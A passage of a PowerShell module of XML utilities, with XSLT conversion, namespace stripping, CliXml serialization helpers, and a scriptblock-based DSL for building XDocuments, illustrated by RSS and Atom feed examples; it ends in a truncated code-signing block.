$document.ImportNode($xValue.SelectSingleNode("/*"), $true) } $nodes = Select-Xml @Select | Where-Object { $_ } if(@($nodes).Count -eq 0) { Write-Warning "No nodes matched your XPath, nothing will be updated" } foreach($node in $nodes) { $select.XPath = "$XPath/parent::*" $parent = Select-Xml @Select if(!$xValue) { if($node -is [System.Xml.XmlAttribute] -and $Value.Contains("=")) { $aName, $aValue = $Value.Split("=",2) if($aName.Contains(":")){ $ns,$name = $aName.Split(":",2) $xValue = $document.CreateAttribute( $name, $Namespace[$ns] ) } else { $xValue = $document.CreateAttribute( $aName ) } $xValue.Value = $aValue } } switch($PSCmdlet.ParameterSetName) { "Before" { $null = $parent.InsertBefore( $xValue, $node ) } "After" { $null = $parent.InsertAfter( $xValue, $node ) } "Append" { $null = $parent.AppendChild( $xValue ) } "Remove" { $null = $parent.RemoveChild( $node ) } "Replace" { if(!$xValue) { $xValue = $document.CreateTextNode( $Value ) } $null = $parent.ReplaceChild( $xValue, $node ) } "Set" { if(!$xValue -and $node."#text") { $node."#text" = $Value } else { if($node -is [System.Xml.XmlElement]) { if(!$xValue) { $xValue = $document.CreateTextNode( $Value ) } $null = $node.set_innerXml("") $null = $node.AppendChild($xValue) } elseif($node -is [System.Xml.XmlAttribute]) { $node.Value = $Value } else { Write-Warning "$XPath selects a node of type $($node.GetType()), which we haven't handled. Please add that handler!" } } } } } if($Passthru) { Write-Output $XmlNode } } }} Set-Alias uxml Update-Xml -EA 0 Set-Alias ux Update-Xml -EA 0 function Convert-Node { #.Synopsis # Convert a single XML Node via XSL stylesheets [CmdletBinding(DefaultParameterSetName="Reader")] param( [Parameter(ParameterSetName="ByNode",Mandatory=$true,ValueFromPipeline=$true)] [System.Xml.XmlNode]$Node , [Parameter(ParameterSetName="Reader",Mandatory=$true,ValueFromPipeline=$true)] [System.Xml.XmlReader]$XmlReader , [Parameter(Position=1,Mandatory=$true,ValueFromPipeline=$false)] [System.Xml.Xsl.XslCompiledTransform]$StyleSheet , [Parameter(Position=2,Mandatory=$false)] [Alias("Parameters")] [hashtable]$Arguments ) PROCESS { if($PSCmdlet.ParameterSetName -eq "ByNode") { $XmlReader = New-Object Xml.XmlNodeReader $node } $output = New-Object IO.StringWriter $argList = $null if($Arguments) { $argList = New-Object System.Xml.Xsl.XsltArgumentList foreach($arg in $Arguments.GetEnumerator()) { $namespace, $name = $arg.Key -split ":" ## Fix namespace if(!$name) { $name = $Namespace $namespace = "" } Write-Verbose "ns:$namespace name:$name value:$($arg.Value)" $argList.AddParam($name,"$namespace",$arg.Value) } } $StyleSheet.Transform( $XmlReader, $argList, $output ) Write-Output $output.ToString() } } function Convert-Xml { #.Synopsis # The Convert-XML function lets you use Xslt to transform XML strings and documents. #.Description # Documentation TODO [CmdletBinding(DefaultParameterSetName="Xml")] param( # Specifies one or more XML nodes to process. [Parameter(Position=1,ParameterSetName="Xml",Mandatory=$true,ValueFromPipeline=$true,ValueFromPipelineByPropertyName=$true)] [ValidateNotNullOrEmpty()] [Alias("Node")] [System.Xml.XmlNode[]]$Xml , # Specifies an Xml StyleSheet to transform with... [Parameter(Position=0,Mandatory=$true,ValueFromPipeline=$false)] [ValidateNotNullOrEmpty()] [Alias("StyleSheet")] [String]$Xslt , # Specify arguments to the XSL Transformation [Alias("Parameters")] [hashtable]$Arguments ) begin { $StyleSheet = New-Object System.Xml.Xsl.XslCompiledTransform if(Test-Path $Xslt -EA 0) { Write-Verbose "Loading Stylesheet from $(Resolve-Path $Xslt)" $StyleSheet.Load( (Resolve-Path $Xslt) ) } else { $OFS = "`n" Write-Verbose "$Xslt" $StyleSheet.Load(([System.Xml.XmlReader]::Create((New-Object System.IO.StringReader $Xslt)))) } } process { foreach($node in $Xml) { Convert-Node -Xml (New-Object Xml.XmlNodeReader $node) $StyleSheet $Arguments } } } Set-Alias cvxml Convert-Xml -EA 0 function Remove-XmlNamespace { #.Synopsis # Removes namespace definitions and prefixes from xml documents #.Description # Runs an xml document through an XSL Transformation to remove namespaces from it if they exist. # Entities are also naturally expanded #.Parameter Content # Specifies a string that contains the XML to transform. #.Parameter Path # Specifies the path and file names of the XML files to transform. Wildcards are permitted. # # There will bne one output document for each matching input file. #.Parameter Xml # Specifies one or more XML documents to transform [CmdletBinding(DefaultParameterSetName="Xml")] PARAM( [Parameter(Position=1,ParameterSetName="Xml",Mandatory=$true,ValueFromPipeline=$true,ValueFromPipelineByPropertyName=$true)] [ValidateNotNullOrEmpty()] [Alias("Node")] [System.Xml.XmlNode[]]$Xml ) BEGIN { $StyleSheet = New-Object System.Xml.Xsl.XslCompiledTransform $StyleSheet.Load(([System.Xml.XmlReader]::Create((New-Object System.IO.StringReader @" <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:output method="xml" indent="yes"/> <xsl:template match="/|comment()|processing-instruction()"> <xsl:copy> <xsl:apply-templates/> </xsl:copy> </xsl:template> <xsl:template match="*"> <xsl:element name="{local-name()}"> <xsl:apply-templates select="@*|node()"/> </xsl:element> </xsl:template> <xsl:template match="@*"> <xsl:attribute name="{local-name()}"> <xsl:value-of select="."/> </xsl:attribute> </xsl:template> </xsl:stylesheet> "@)))) [Text.StringBuilder]$XmlContent = [String]::Empty } PROCESS { $Xml | Convert-Node $StyleSheet } } Set-Alias rmns Remove-XmlNamespace -EA 0 Set-Alias rmxns Remove-XmlNamespace -EA 0 ######## Helper functions for working with CliXml function ConvertFrom-CliXml { param( [Parameter(Position=0, Mandatory=$true, ValueFromPipeline=$true)] [ValidateNotNullOrEmpty()] [String[]]$InputObject ) begin { $OFS = "`n" [String]$xmlString = "" } process { $xmlString += $InputObject } end { $type = [psobject].assembly.gettype("System.Management.Automation.Deserializer") $ctor = $type.getconstructor("instance,nonpublic", $null, @([xml.xmlreader]), $null) $sr = new-object System.IO.StringReader $xmlString $xr = new-object System.Xml.XmlTextReader $sr $deserializer = $ctor.invoke($xr) $method = @($type.getmethods("nonpublic,instance") | where-object {$_.name -like "Deserialize"})[1] $done = $type.getmethod("Done", [System.Reflection.BindingFlags]"nonpublic,instance") while (!$done.invoke($deserializer, @())) { try { $method.invoke($deserializer, "") } catch { write-warning "Could not deserialize $xmlString" } } $xr.Close() $sr.Dispose() } } function ConvertTo-CliXml { param( [Parameter(Position=0, Mandatory=$true, ValueFromPipeline=$true)] [ValidateNotNullOrEmpty()] [PSObject[]]$InputObject ) begin { $type = [psobject].assembly.gettype("System.Management.Automation.Serializer") $ctor = $type.getconstructor("instance,nonpublic", $null, @([System.Xml.XmlWriter]), $null) $sw = new-object System.IO.StringWriter $xw = new-object System.Xml.XmlTextWriter $sw $serializer = $ctor.invoke($xw) $method = $type.getmethod("Serialize", "nonpublic,instance", $null, [type[]]@([object]), $null) $done = $type.getmethod("Done", [System.Reflection.BindingFlags]"nonpublic,instance") } process { try { [void]$method.invoke($serializer, $InputObject) } catch { write-warning "Could not serialize $($InputObject.gettype()): $InputObject" } } end { [void]$done.invoke($serializer, @()) $sw.ToString() $xw.Close() $sw.Dispose() } } ######## From here down is all the code related to my XML DSL: function New-XDocument { #.Synopsis # Creates a new XDocument (the new xml document type) #.Description # This is the root for a new XML mini-dsl, akin to New-BootsWindow for XAML # It creates a new XDocument, and takes scritpblock(s) to define it's contents #.Parameter root # The root node name #.Parameter version # Optional: the XML version. Defaults to 1.0 #.Parameter encoding # Optional: the Encoding. Defaults to UTF-8 #.Parameter standalone # Optional: whether to specify standalone in the xml declaration. Defaults to "yes" #.Parameter args # this is where all the dsl magic happens. Please see the Examples. :) # #.Example # [string]$xml = New-XDocument rss -version "2.0" { # channel { # title {"Test RSS Feed"} # link {"http`://HuddledMasses.org"} # description {"An RSS Feed generated simply to demonstrate my XML DSL"} # item { # title {"The First Item"} # link {"http`://huddledmasses.org/new-site-new-layout-lost-posts/"} # guid -isPermaLink true {"http`://huddledmasses.org/new-site-new-layout-lost-posts/"} # description {"Ema Lazarus' Poem"} # pubDate {(Get-Date 10/31/2003 -f u) -replace " ","T"} # } # } # } # # C:\\PS>$xml.Declaration.ToString() ## I can't find a way to have this included in the $xml.ToString() # C:\\PS>$xml.ToString() # # <?xml version="1.0" encoding="UTF-8" standalone="yes"?> # <rss version="2.0"> # <channel> # <title>Test RSS Feed</title> # <link>http ://HuddledMasses.org</link> # <description>An RSS Feed generated simply to demonstrate my XML DSL</description> # <item> # <title>The First Item</title> # <link>http ://huddledmasses.org/new-site-new-layout-lost-posts/</link> # <guid isPermaLink="true">http ://huddledmasses.org/new-site-new-layout-lost-posts/</guid> # <description>Ema Lazarus' Poem</description> # <pubDate>2003-10-31T00:00:00Z</pubDate> # </item> # </channel> # </rss> # # # Description # ----------- # This example shows the creation of a complete RSS feed with a single item in it. # # NOTE that the backtick in the http`: in the URLs in the input is unecessary, and I added the space after the http: in the URLs in the output -- these are accomodations to PoshCode's spam filter. Backticks are not need in the input, and spaces do not appear in the actual output. # # #.Example # [XNamespace]$atom="http`://www.w3.org/2005/Atom" # C:\\PS>[XNamespace]$dc = "http`://purl.org/dc/elements/1.1" # # C:\\PS>New-XDocument ($atom + "feed") -Encoding "UTF-16" -$([XNamespace]::Xml +'lang') "en-US" -dc $dc { # title {"Test First Entry"} # link {"http`://HuddledMasses.org"} # updated {(Get-Date -f u) -replace " ","T"} # author { # name {"Joel Bennett"} # uri {"http`://HuddledMasses.org"} # } # id {"http`://huddledmasses.org/" } # # entry { # title {"Test First Entry"} # link {"http`://HuddledMasses.org/new-site-new-layout-lost-posts/" } # id {"http`://huddledmasses.org/new-site-new-layout-lost-posts/" } # updated {(Get-Date 10/31/2003 -f u) -replace " ","T"} # summary {"Ema Lazarus' Poem"} # link -rel license -href "http`://creativecommons.org/licenses/by/3.0/" -title "CC By-Attribution" # dc:rights { "Copyright 2009, Some rights reserved (licensed under the Creative Commons Attribution 3.0 Unported license)" } # category -scheme "http`://huddledmasses.org/tag/" -term "huddled-masses" # } # } | % { $_.Declaration.ToString(); $_.ToString() } # # <?xml version="1.0" encoding="UTF-16" standalone="yes"?> # <feed xml:lang="en-US" xmlns="http ://www.w3.org/2005/Atom"> # <title>Test First Entry</title> # <link>http ://HuddledMasses.org</link> # <updated>2009-07-29T17:25:49Z</updated> # <author> # <name>Joel Bennett</name> # <uri>http ://HuddledMasses.org</uri> # </author> # <id>http ://huddledmasses.org/</id> # <entry> # <title>Test First Entry</title> # <link>http ://HuddledMasses.org/new-site-new-layout-lost-posts/</link> # <id>http ://huddledmasses.org/new-site-new-layout-lost-posts/</id> # <updated>2003-10-31T00:00:00Z</updated> # <summary>Ema Lazarus' Poem</summary> # <link rel="license" href="http ://creativecommons.org/licenses/by/3.0/" title="CC By-Attribution" /> # <dc:rights>Copyright 2009, Some rights reserved (licensed under the Creative Commons Attribution 3.0 Unported license)</dc:rights> # <category scheme="http ://huddledmasses.org/tag/" term="huddled-masses" /> # </entry> # </feed> # # # Description # ----------- # This example shows the use of a default namespace, as well as additional specific namespaces for the "dc" namespace. It also demonstrates how you can get the <?xml?> declaration which does not appear in a simple .ToString(). # # NOTE that the backtick in the http`: in the URLs in the input is unecessary, and I added the space after the http: in the URLs in the output -- these are accomodations to PoshCode's spam filter. Backticks are not need in the input, and spaces do not appear in the actual output.# # [CmdletBinding()] Param( [Parameter(Mandatory = $true, Position = 0)] [System.Xml.Linq.XName]$root , [Parameter(Mandatory = $false)] [string]$Version = "1.0" , [Parameter(Mandatory = $false)] [string]$Encoding = "UTF-8" , [Parameter(Mandatory = $false)] [string]$Standalone = "yes" , [AllowNull()][AllowEmptyString()][AllowEmptyCollection()] [Parameter(Position=99, Mandatory = $false, ValueFromRemainingArguments=$true)] [PSObject[]]$args ) BEGIN { $script:NameSpaceHash = New-Object 'Dictionary[String,XNamespace]' if($root.NamespaceName) { $script:NameSpaceHash.Add("", $root.Namespace) } } PROCESS { New-Object XDocument (New-Object XDeclaration $Version, $Encoding, $standalone),( New-Object XElement $( $root while($args) { $attrib, $value, $args = $args if($attrib -is [ScriptBlock]) { # Write-Verbose "Preparsed DSL: $attrib" $attrib = ConvertFrom-XmlDsl $attrib Write-Verbose "Reparsed DSL: $attrib" &$attrib } elseif ( $value -is [ScriptBlock] -and "-CONTENT".StartsWith($attrib.TrimEnd(':').ToUpper())) { $value = ConvertFrom-XmlDsl $value &$value } elseif ( $value -is [XNamespace]) { New-Object XAttribute ([XNamespace]::Xmlns + $attrib.TrimStart("-").TrimEnd(':')), $value $script:NameSpaceHash.Add($attrib.TrimStart("-").TrimEnd(':'), $value) } else { Write-Verbose "XAttribute $attrib = $value" New-Object XAttribute $attrib.TrimStart("-").TrimEnd(':'), $value } } )) } } Set-Alias xml New-XDocument -EA 0 Set-Alias New-Xml New-XDocument -EA 0 function New-XAttribute { #.Synopsys # Creates a new XAttribute (an xml attribute on an XElement for XDocument) #.Description # This is the work-horse for the XML mini-dsl #.Parameter name # The attribute name #.Parameter value # The attribute value [CmdletBinding()] Param([Parameter(Mandatory=$true)]$name,[Parameter(Mandatory=$true)]$value) New-Object XAttribute $name, $value } Set-Alias xa New-XAttribute -EA 0 Set-Alias New-XmlAttribute New-XAttribute -EA 0 function New-XElement { #.Synopsys # Creates a new XElement (an xml tag for XDocument) #.Description # This is the work-horse for the XML mini-dsl #.Parameter tag # The name of the xml tag #.Parameter args # this is where all the dsl magic happens. Please see the Examples. :) [CmdletBinding()] Param( [Parameter(Mandatory = $true, Position = 0)] [System.Xml.Linq.XName]$tag , [AllowNull()][AllowEmptyString()][AllowEmptyCollection()] [Parameter(Position=99, Mandatory = $false, ValueFromRemainingArguments=$true)] [PSObject[]]$args ) PROCESS { New-Object XElement $( $tag while($args) { $attrib, $value, $args = $args if($attrib -is [ScriptBlock]) { # then it's content &$attrib } elseif ( $value -is [ScriptBlock] -and "-CONTENT".StartsWith($attrib.TrimEnd(':').ToUpper())) { # then it's content &$value } elseif ( $value -is [XNamespace]) { New-Object XAttribute ([XNamespace]::Xmlns + $attrib.TrimStart("-").TrimEnd(':')), $value $script:NameSpaceHash.Add($attrib.TrimStart("-").TrimEnd(':'), $value) } elseif($value -match "-(?!\\d)\\w") { $args = @($value)+@($args) } elseif($value -ne $null) { New-Object XAttribute $attrib.TrimStart("-").TrimEnd(':'), $value } } ) } } Set-Alias xe New-XElement Set-Alias New-XmlElement New-XElement function ConvertFrom-XmlDsl { Param([ScriptBlock]$script) $parserrors = $null $global:tokens = [PSParser]::Tokenize( $script, [ref]$parserrors ) [Array]$duds = $global:tokens | Where-Object { $_.Type -eq "Command" -and !$_.Content.Contains('-') -and ($(Get-Command $_.Content -Type Cmdlet,Function,ExternalScript -EA 0) -eq $Null) } [Array]::Reverse( $duds ) [string[]]$ScriptText = "$script" -split "`n" ForEach($token in $duds ) { # replace : notation with namespace notation if( $token.Content.Contains(":") ) { $key, $localname = $token.Content -split ":" $ScriptText[($token.StartLine - 1)] = $ScriptText[($token.StartLine - 1)].Remove( $token.StartColumn -1, $token.Length ).Insert( $token.StartColumn -1, "'" + $($script:NameSpaceHash[$key] + $localname) + "'" ) } else { $ScriptText[($token.StartLine - 1)] = $ScriptText[($token.StartLine - 1)].Remove( $token.StartColumn -1, $token.Length ).Insert( $token.StartColumn -1, "'" + $($script:NameSpaceHash[''] + $token.Content) + "'" ) } # insert 'xe' before everything (unless it's a valid command) $ScriptText[($token.StartLine - 1)] = $ScriptText[($token.StartLine - 1)].Insert( $token.StartColumn -1, "xe " ) } Write-Output ([ScriptBlock]::Create( ($ScriptText -join "`n") )) } ######## Xaml # if($PSVersionTable.CLRVersion -ge "4.0"){ # trap { continue } # [Reflection.Assembly]::LoadWithPartialName("System.Xaml") | Out-Null # if("System.Xaml.XamlServices" -as [type]) { # } # } Export-ModuleMember -alias * -function New-XDocument, New-XAttribute, New-XElement, Remove-XmlNamespace, Get-XmlContent, Set-XmlContent, ConvertTo-Xml, Select-Xml, Update-Xml, Format-Xml, ConvertTo-CliXml, ConvertFrom-CliXml # SIG # Begin signature block # MIIdZgYJKoZIhvcNAQcCoIIdVzCCHVMCAQExCzAJBgUrDgMCGgUAMGkGCisGAQQB # gjcCAQSgWzBZMDQGCisGAQQBgjcCAR4wJgIDAQAABBAfzDtgWUsITrck0sYpfvNR # AgEAAgEAAgEAAgEAAgEAMCEwCQYFKw4DAhoFAAQUtjycTLbprXSw4krXhTfs6eQf # geWgghkkMIIDnzCCAoegAwIBAgIQeaKlhfnRFUIT2bg+9raN7TANBgkqhkiG9w0B # AQUFADBTMQswCQYDVQQGEwJVUzEXMBUGA1UEChMOVmVyaVNpZ24sIEluYy4xKzAp # BgNVBAMTIlZlcmlTaWduIFRpbWUgU3RhbXBpbmcgU2VydmljZXMgQ0EwHhcNMTIw # NTAxMDAwMDAwWhcNMTIxMjMxMjM1OTU5WjBiMQswCQYDVQQGEwJVUzEdMBsGA1UE # ChMUU3ltYW50ZWMgQ29ycG9yYXRpb24xNDAyBgNVBAMTK1N5bWFudGVjIFRpbWUg # U3RhbXBpbmcgU2VydmljZXMgU2lnbmVyIC0gRzMwgZ8wDQYJKoZIhvcNAQEBBQAD # gY0AMIGJAoGBAKlZZnTaPYp9etj89YBEe/5HahRVTlBHC+zT7c72OPdPabmx8LZ4 # ggqMdhZn4gKttw2livYD/GbT/AgtzLVzWXuJ3DNuZlpeUje0YtGSWTUUi0WsWbJN # JKKYlGhCcp86aOJri54iLfSYTprGr7PkoKs8KL8j4ddypPIQU2eud69RAgMBAAGj # geMwgeAwDAYDVR0TAQH/BAIwADAzBgNVHR8ELDAqMCigJqAkhiJodHRwOi8vY3Js # LnZlcmlzaWduLmNvbS90c3MtY2EuY3JsMBYGA1UdJQEB/wQMMAoGCCsGAQUFBwMI # MDQGCCsGAQUFBwEBBCgwJjAkBggrBgEFBQcwAYYYaHR0cDovL29jc3AudmVyaXNp # Z24uY29tMA4GA1UdDwEB/wQEAwIHgDAeBgNVHREEFzAVpBMwETEPMA0GA1UEAxMG # VFNBMS0zMB0GA1UdDgQWBBS0t/GJSSZg52Xqc67c0zjNv1eSbzANBgkqhkiG9w0B # AQUFAAOCAQEAHpiqJ7d4tQi1yXJtt9/ADpimNcSIydL2bfFLGvvV+S2ZAJ7R55uL # 4T+9OYAMZs0HvFyYVKaUuhDRTour9W9lzGcJooB8UugOA9ZresYFGOzIrEJ8Byyn # PQhm3ADt/ZQdc/JymJOxEdaP747qrPSWUQzQjd8xUk9er32nSnXmTs4rnykr589d # nwN+bid7I61iKWavkugszr2cf9zNFzxDwgk/dUXHnuTXYH+XxuSqx2n1/M10rCyw # SMFQTnBWHrU1046+se2svf4M7IV91buFZkQZXZ+T64K6Y57TfGH/yBvZI1h/MKNm # oTkmXpLDPMs3Mvr1o43c1bCj6SU2VdeB+jCCA8QwggMtoAMCAQICEEe/GZXfjVJG # Q/fbbUgNMaQwDQYJKoZIhvcNAQEFBQAwgYsxCzAJBgNVBAYTAlpBMRUwEwYDVQQI # EwxXZXN0ZXJuIENhcGUxFDASBgNVBAcTC0R1cmJhbnZpbGxlMQ8wDQYDVQQKEwZU # aGF3dGUxHTAbBgNVBAsTFFRoYXd0ZSBDZXJ0aWZpY2F0aW9uMR8wHQYDVQQDExZU # aGF3dGUgVGltZXN0YW1waW5nIENBMB4XDTAzMTIwNDAwMDAwMFoXDTEzMTIwMzIz # NTk1OVowUzELMAkGA1UEBhMCVVMxFzAVBgNVBAoTDlZlcmlTaWduLCBJbmMuMSsw # KQYDVQQDEyJWZXJpU2lnbiBUaW1lIFN0YW1waW5nIFNlcnZpY2VzIENBMIIBIjAN # BgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqcqypMzNIK8KfYmsh3XwtE7x38EP # v2dhvaNkHNq7+cozq4QwiVh+jNtr3TaeD7/R7Hjyd6Z+bzy/k68Numj0bJTKvVIt # q0g99bbVXV8bAp/6L2sepPejmqYayALhf0xS4w5g7EAcfrkN3j/HtN+HvV96ajEu # A5mBE6hHIM4xcw1XLc14NDOVEpkSud5oL6rm48KKjCrDiyGHZr2DWFdvdb88qiaH # XcoQFTyfhOpUwQpuxP7FSt25BxGXInzbPifRHnjsnzHJ8eYiGdvEs0dDmhpfoB6Q # 5F717nzxfatiAY/1TQve0CJWqJXNroh2ru66DfPkTdmg+2igrhQ7s4fBuwIDAQAB # o4HbMIHYMDQGCCsGAQUFBwEBBCgwJjAkBggrBgEFBQcwAYYYaHR0cDovL29jc3Au # dmVyaXNpZ24uY29tMBIGA1UdEwEB/wQIMAYBAf8CAQAwQQYDVR0fBDowODA2oDSg # MoYwaHR0cDovL2NybC52ZXJpc2lnbi5jb20vVGhhd3RlVGltZXN0YW1waW5nQ0Eu # Y3JsMBMGA1UdJQQMMAoGCCsGAQUFBwMIMA4GA1UdDwEB/wQEAwIBBjAkBgNVHREE # HTAbpBkwFzEVMBMGA1UEAxMMVFNBMjA0OC0xLTUzMA0GCSqGSIb3DQEBBQUAA4GB # AEpr+epYwkQcMYl5mSuWv4KsAdYcTM2wilhu3wgpo17IypMT5wRSDe9HJy8AOLDk # yZNOmtQiYhX3PzchT3AxgPGLOIez6OiXAP7PVZZOJNKpJ056rrdhQfMqzufJ2V7d # uyuFPrWdtdnhV/++tMV+9c8MnvCX/ivTO1IbGzgn9z9KMIIETzCCA7igAwIBAgIE # BydYPTANBgkqhkiG9w0BAQUFADB1MQswCQYDVQQGEwJVUzEYMBYGA1UEChMPR1RF # IENvcnBvcmF0aW9uMScwJQYDVQQLEx5HVEUgQ3liZXJUcnVzdCBTb2x1dGlvbnMs # IEluYy4xIzAhBgNVBAMTGkdURSBDeWJlclRydXN0IEdsb2JhbCBSb290MB4XDTEw # MDExMzE5MjAzMloXDTE1MDkzMDE4MTk0N1owbDELMAkGA1UEBhMCVVMxFTATBgNV # BAoTDERpZ2lDZXJ0IEluYzEZMBcGA1UECxMQd3d3LmRpZ2ljZXJ0LmNvbTErMCkG # A1UEAxMiRGlnaUNlcnQgSGlnaCBBc3N1cmFuY2UgRVYgUm9vdCBDQTCCASIwDQYJ # KoZIhvcNAQEBBQADggEPADCCAQoCggEBAMbM5XPm+9S75S0tMqbf5YE/yc0lSbZx # KsPVlDRnogocsF9ppkCxxLeyj9CYpKlBWTrT3JTWPNt0OKRKzE0lgvdKpVMSOO7z # SW1xkX5jtqumX8OkhPhPYlG++MXs2ziS4wblCJEMxChBVfvLWokVfnHoNb9Ncgk9 # vjo4UFt3MRuNs8ckRZqnrG0AFFoEt7oT61EKmEFBIk5lYYeBQVCmeVyJ3hlKV9Uu # 5l0cUyx+mM0aBhakaHPQNAQTXKFx01p8VdteZOE3hzBWBOURtCmAEvF5OYiiAhF8 # J2a3iLd48soKqDirCmTCv2ZdlYTBoSUeh10aUAsgEsxBu24LUTi4S8sCAwEAAaOC # AW8wggFrMBIGA1UdEwEB/wQIMAYBAf8CAQEwUwYDVR0gBEwwSjBIBgkrBgEEAbE+ # AQAwOzA5BggrBgEFBQcCARYtaHR0cDovL2N5YmVydHJ1c3Qub21uaXJvb3QuY29t # L3JlcG9zaXRvcnkuY2ZtMA4GA1UdDwEB/wQEAwIBBjCBiQYDVR0jBIGBMH+heaR3 # MHUxCzAJBgNVBAYTAlVTMRgwFgYDVQQKEw9HVEUgQ29ycG9yYXRpb24xJzAlBgNV # BAsTHkdURSBDeWJlclRydXN0IFNvbHV0aW9ucywgSW5jLjEjMCEGA1UEAxMaR1RF # IEN5YmVyVHJ1c3QgR2xvYmFsIFJvb3SCAgGlMEUGA1UdHwQ+MDwwOqA4oDaGNGh0 # dHA6Ly93d3cucHVibGljLXRydXN0LmNvbS9jZ2ktYmluL0NSTC8yMDE4L2NkcC5j # cmwwHQYDVR0OBBYEFLE+w2kD+L9HAdSYJhoIAu9jZCvDMA0GCSqGSIb3DQEBBQUA # A4GBAC52hdk3lm2vifMGeIIxxEYHH2XJjrPJVHjm0ULfdS4eVer3+psEwHV70Xk8 # Bex5xFLdpgPXp1CZPwVZ2sZV9IacDWejSQSVMh3Hh+yFr2Ru1cVfCadAfRa6SQ2i # /fbfVTBs13jGuc9YKWQWTKMggUexRJKEFhtvSrwhxgo97TPKMIIGnzCCBYegAwIB # AgIQDmkGmMIUyHq1tgS5FjzRkDANBgkqhkiG9w0BAQUFADBzMQswCQYDVQQGEwJV # UzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3d3cuZGlnaWNlcnQu # Y29tMTIwMAYDVQQDEylEaWdpQ2VydCBIaWdoIEFzc3VyYW5jZSBDb2RlIFNpZ25p # bmcgQ0EtMTAeFw0xMjAzMjAwMDAwMDBaFw0xMzAzMjIxMjAwMDBaMG0xCzAJBgNV # BAYTAlVTMREwDwYDVQQIEwhOZXcgWW9yazEXMBUGA1UEBxMOV2VzdCBIZW5yaWV0 # dGExGDAWBgNVBAoTD0pvZWwgSC4gQmVubmV0dDEYMBYGA1UEAxMPSm9lbCBILiBC # ZW5uZXR0MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2ogGAG89d1jM # fRJv2d3U1lCsW8ok7GkjnLYDn0zC1ALq11rWN5NVwVbn133i+KV0O8kM5vd2M7xE # 8CnVAgybjkrvRD2IqMtp4SrwQuiGiVGsNVWO3vSLHcWsS/I7N0UIpS5PhTuFB4Pc # Oy/MHR4F2g6JLMrAtkpYWxauAFZfFwuEfm6vqWobHTDt5wG+zqOTxMSi1UvL5fEM # DoejGqqriIx5mKDzrvUb/ALNKZ1rGPWlT7O0/UHrV5VuOfgij4XVKBAdcg9JLxky # AEIJ+VvVQ2Jn3lVONCCHbfu5IVhddMru81U/v5Wrj80Zrwh2TH25qlclUKr6eXRL # tP+xFm23CwIDAQABo4IDMzCCAy8wHwYDVR0jBBgwFoAUl0gD6xUIa7myWCPMlC7x # xmXSZI4wHQYDVR0OBBYEFJicRKq/XsBWRuKzU6eTUCBCCU65MA4GA1UdDwEB/wQE # AwIHgDATBgNVHSUEDDAKBggrBgEFBQcDAzBpBgNVHR8EYjBgMC6gLKAqhihodHRw # Oi8vY3JsMy5kaWdpY2VydC5jb20vaGEtY3MtMjAxMWEuY3JsMC6gLKAqhihodHRw # Oi8vY3JsNC5kaWdpY2VydC5jb20vaGEtY3MtMjAxMWEuY3JsMIIBxAYDVR0gBIIB # uzCCAbcwggGzBglghkgBhv1sAwEwggGkMDoGCCsGAQUFBwIBFi5odHRwOi8vd3d3 # LmRpZ2ljZXJ0LmNvbS9zc2wtY3BzLXJlcG9zaXRvcnkuaHRtMIIBZAYIKwYBBQUH # AgIwggFWHoIBUgBBAG4AeQAgAHUAcwBlACAAbwBmACAAdABoAGkAcwAgAEMAZQBy # AHQAaQBmAGkAYwBhAHQAZQAgAGMAbwBuAHMAdABpAHQAdQB0AGUAcwAgAGEAYwBj # AGUAcAB0AGEAbgBjAGUAIABvAGYAIAB0AGgAZQAgAEQAaQBnAGkAQwBlAHIAdAAg # AEMAUAAvAEMAUABTACAAYQBuAGQAIAB0AGgAZQAgAFIAZQBsAHkAaQBuAGcAIABQ # AGEAcgB0AHkAIABBAGcAcgBlAGUAbQBlAG4AdAAgAHcAaABpAGMAaAAgAGwAaQBt # AGkAdAAgAGwAaQBhAGIAaQBsAGkAdAB5ACAAYQBuAGQAIABhAHIAZQAgAGkAbgBj # AG8AcgBwAG8AcgBhAHQAZQBkACAAaABlAHIAZQBpAG4AIABiAHkAIAByAGUAZgBl # AHIAZQBuAGMAZQAuMIGGBggrBgEFBQcBAQR6MHgwJAYIKwYBBQUHMAGGGGh0dHA6 # Ly9vY3NwLmRpZ2ljZXJ0LmNvbTBQBggrBgEFBQcwAoZEaHR0cDovL2NhY2VydHMu # ZGlnaWNlcnQuY29tL0RpZ2lDZXJ0SGlnaEFzc3VyYW5jZUNvZGVTaWduaW5nQ0Et # MS5jcnQwDAYDVR0TAQH/BAIwADANBgkqhkiG9w0BAQUFAAOCAQEAHIfeYpO0Jtdi # /TpcI6eWQIYU2ALO847Q91jLE6WiU6u8wN6tkHqgeOls070SDUK+C1rVoXKKZ0Je # c2k1dYukKPkyf3qURPyh/aC3hJ0Wwbje7fK79Lt9ZHwJORpesJrwa8T63l3qLLLl # PaIYo/bqiMpNZRfOclukKg2hO67yMaQl8DEL/D5UP1XZShF2zbauH627zEC5KXGZ # Y2yUbmWG2N0oHxr+q4Gyfd0MPtU5avWOILB0ZsN+br+SCVVK6nKzauXMk4HXmKHa # X7cysqpmQiFb7/J7tPQ037KQKHCY/Z+fl0arRCiHih/Q/5owv51WSKPiaUrkBvdJ # 0mKVK+McHzCCBr8wggWnoAMCAQICEAgcV+5dcOuboLFSDHKcGwkwDQYJKoZIhvcN # AQEFBQAwbDELMAkGA1UEBhMCVVMxFTATBgNVBAoTDERpZ2lDZXJ0IEluYzEZMBcG # A1UECxMQd3d3LmRpZ2ljZXJ0LmNvbTErMCkGA1UEAxMiRGlnaUNlcnQgSGlnaCBB # c3N1cmFuY2UgRVYgUm9vdCBDQTAeFw0xMTAyMTAxMjAwMDBaFw0yNjAyMTAxMjAw # MDBaMHMxCzAJBgNVBAYTAlVTMRUwEwYDVQQKEwxEaWdpQ2VydCBJbmMxGTAXBgNV # BAsTEHd3dy5kaWdpY2VydC5jb20xMjAwBgNVBAMTKURpZ2lDZXJ0IEhpZ2ggQXNz # dXJhbmNlIENvZGUgU2lnbmluZyBDQS0xMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8A # MIIBCgKCAQEAxfkj5pQnxIAUpIAyX0CjjW9wwOU2cXE6daSqGpKUiV6sI3HLTmd9 # QT+q40u3e76dwag4j2kvOiTpd1kSx2YEQ8INJoKJQBnyLOrnTOd8BRq4/4gJTyY3 # 